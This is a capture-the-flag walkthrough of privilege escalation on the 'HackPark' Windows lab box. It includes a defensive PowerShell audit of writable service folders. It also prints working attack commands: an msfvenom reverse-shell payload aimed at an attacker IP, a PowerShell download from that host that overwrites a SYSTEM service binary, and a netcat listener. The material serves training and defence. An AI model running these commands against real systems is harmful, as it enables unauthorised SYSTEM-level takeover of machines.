CHALLENGE OVERVIEW
- Link: hackpark
- Difficulty: Medium
- Target: user and root flags on a Windows machine
- Highlight: hijacking a system process to spawn a reverse shell
- Tools: nmap, dirb, hydra, burpsuite, msfvenom
- Tags: RCE (remote code execution), Windows, Winpeas
BACKGROUND

In this walkthrough, we will continue to build on our work in Hackpark I, but this time we will solve the box again without Metasploit.
The general approach will be to use winPEAS to automate local enumeration of the server. We’ll review the results of winPEAS and continue our privilege escalation by spoofing a system process and throwing an NT AUTHORITY\SYSTEM reverse shell (aka Windows root shell!).
Watching the first few minutes of the video might be a good review of Hackpark part I, because I quickly go through the final steps of the foothold stage below, starting with payload creation using msfvenom, and then I slow down again for the privilege escalation stage without using Metasploit.
ATTACK MAP
We’ll be picking up on the box from the alternative privesc attack vector shown below (Method 2).

SPIN UP A SIMPLE HTTP SERVER TO TRANSFER WINPEAS TO TARGET
Issue the following command to spin up a simple HTTP server (it listens on port 8000 by default) from the directory that holds the winpeas.exe file:
python3 -m http.server
LOCAL RECON WITH WINPEAS

Run winPEAS on the target now:
winpeas.exe

TEST OUT THE AUTO-LOADING USER:PASS COMBO WITH REMOTE DESKTOP

Let’s follow up on winPEAS’ first interesting finding. We attempt to log in to the server over the remote desktop protocol (RDP) using the autologon credentials it reported.
Unfortunately, this turns out to be a dead end. We’ll move on to other interesting findings.
REVIEW INTERESTING FINDINGS

The other interesting finding from winPEAS that jumps out at me is:
========================= WindowsScheduler(Splinterware Software Solutions - System Scheduler Service)[C:\PROGRA~2\SYSTEM~1\WService.exe] - Auto - Running
File Permissions: Everyone [WriteData/CreateFiles]
Possible DLL Hijacking in binary folder: C:\Program Files (x86)\SystemScheduler (Everyone [WriteData/CreateFiles])
System Scheduler Service Wrapper
========================================================================
It appears that there may be a DLL (dynamic link library) hijacking opportunity with the Windows System Scheduler service. More precisely, winPEAS is flagging that the service’s binary folder grants Everyone WriteData/CreateFiles, so any file the service loads from that folder, DLL or executable, can be replaced by an unprivileged user.
The service binary is listed as living in the folder C:\Program Files (x86)\SystemScheduler. Let’s navigate there in our terminal to see which files might be run by the service. On Windows, these files will usually be .exe filetypes.

It looks like the Message.exe file might be the service binary we need to spoof.
Going forward, we will replace that file with our own malicious payload to spawn a reverse shell. We are hoping that NT AUTHORITY\SYSTEM is the account that runs Message.exe, so that the reverse shell will give us full root privileges.
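The misconfiguration winPEAS reported here (a service binary folder writable by Everyone) is easy to audit across a whole host. The following script is an added example for defenders and is not part of the original walkthrough or of winPEAS; it enumerates every installed service, takes the folder its binary lives in, and reports any allow ACE that grants write rights to Everyone, BUILTIN\Users or Authenticated Users. The group list and the rights mask are assumptions chosen for this example; adjust them to your environment.

```powershell
# Added example, not from the original walkthrough: audit every service's binary
# folder for write access granted to broad groups, the condition winPEAS flagged
# for C:\Program Files (x86)\SystemScheduler. Run from an elevated PowerShell prompt.

# Principals that should never be able to write into a service's binary folder
# (assumed list for this example; extend it with your own low-privilege groups).
$broadGroups = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users')

# Any of these rights lets a caller create or replace files in the folder.
$writeMask = [int][System.Security.AccessControl.FileSystemRights]::WriteData -bor
             [int][System.Security.AccessControl.FileSystemRights]::AppendData -bor
             [int][System.Security.AccessControl.FileSystemRights]::Write -bor
             [int][System.Security.AccessControl.FileSystemRights]::Modify -bor
             [int][System.Security.AccessControl.FileSystemRights]::FullControl

function Get-ServiceBinaryPath {
    # Win32_Service.PathName may be quoted, unquoted, and may carry arguments;
    # return just the executable path, or $null if it cannot be determined.
    param([string]$PathName)
    if ([string]::IsNullOrWhiteSpace($PathName)) { return $null }
    if ($PathName.StartsWith('"')) {
        $end = $PathName.IndexOf('"', 1)
        if ($end -lt 1) { return $null }
        return $PathName.Substring(1, $end - 1)
    }
    # Unquoted: take everything up to and including the first ".exe".
    $m = [regex]::Match($PathName, '^(.*?\.exe)', 'IgnoreCase')
    if ($m.Success) { return $m.Groups[1].Value }
    return ($PathName -split '\s+')[0]
}

$findings = foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
    $exe = Get-ServiceBinaryPath -PathName $svc.PathName
    if (-not $exe) { continue }
    $folder = Split-Path -Path $exe -Parent
    if (-not $folder -or -not (Test-Path -LiteralPath $folder)) { continue }
    try { $acl = Get-Acl -LiteralPath $folder -ErrorAction Stop } catch { continue }

    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($broadGroups -notcontains $ace.IdentityReference.Value) { continue }
        if (([int]$ace.FileSystemRights -band $writeMask) -eq 0) { continue }
        [pscustomobject]@{
            Service   = $svc.Name
            RunsAs    = $svc.StartName      # 'LocalSystem' is the high-impact case
            Folder    = $folder
            Principal = $ace.IdentityReference.Value
            Rights    = $ace.FileSystemRights
        }
    }
}

if ($findings) {
    $findings | Sort-Object RunsAs, Service | Format-Table -AutoSize
} else {
    Write-Output 'No service binary folders writable by broad groups were found.'
}
```

On the HackPark box this should list the System Scheduler service with Everyone holding write rights on C:\Program Files (x86)\SystemScheduler while the service runs as LocalSystem. The fix is to remove the broad grant from the folder, for example with icacls "C:\Program Files (x86)\SystemScheduler" /remove:g Everyone, and to verify that the executables inside are writable only by Administrators and SYSTEM. A service that runs as LocalSystem from a user-writable folder is the combination to prioritise, since it turns any local user into SYSTEM as soon as the service restarts.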
CREATE A REVSHELL WITH MSFVENOM
msfvenom -p windows/shell_reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.6.2.23 LPORT=9999 -f exe -o payload.exe
EXPLOIT THE MACHINE BY SPOOFING A WINDOWS SERVICE

Let’s copy payload.exe over to the Windows machine, rename it Message.exe, and place it in the directory C:\Program Files (x86)\SystemScheduler in two easy steps:
- Check that the simple HTTP server is still running on port 8000 of the attack machine in the folder that contains payload.exe. If the file is somewhere else, move payload.exe into the folder that is being served.
- Copy the file over to the target machine as Message.exe, placing it in the SystemScheduler folder, by issuing the following command on Windows:
powershell -c "Invoke-WebRequest -Uri 'http://10.6.2.23:8000/payload.exe' -OutFile 'C:\Program Files (x86)\SystemScheduler\Message.exe'"
FIRE UP A NETCAT LISTENER TO CATCH THE REVSHELL
nc -lnvp 9999
(or whatever port you specified in the msfvenom reverse shell payload)
After waiting a few seconds, we should catch our revshell and confirm with whoami that we are NT AUTHORITY\SYSTEM. We can easily retrieve both flags now using the type command and finish off the box!

FINAL THOUGHTS

This box was one of the more challenging ones I’ve done yet.
It pushed me to chain together several tools that I’ve used in simpler circumstances but never together. With each new hacking challenge completed, I am finding it easier to understand more complex attack vectors.
The details of decrypting hashes, copying files using HTTP servers, and searching for files and privilege escalation pathways on a target system might seem like a lot to grapple with, but with repetition comes familiarity, and the logic of each attack starts to become more obvious.
Thanks for reading my walkthrough! Please let me know in the comments of the youtube video what you thought of today’s tutorial.

I am a freelance ethical hacker/penetration tester. I have extensive experience in penetration testing and vulnerability assessments on web apps and servers. I am also fluent in Mandarin and have 15 years of experience as an edTech integration specialist, curriculum designer, and foreign language teacher. Here’s my personal website.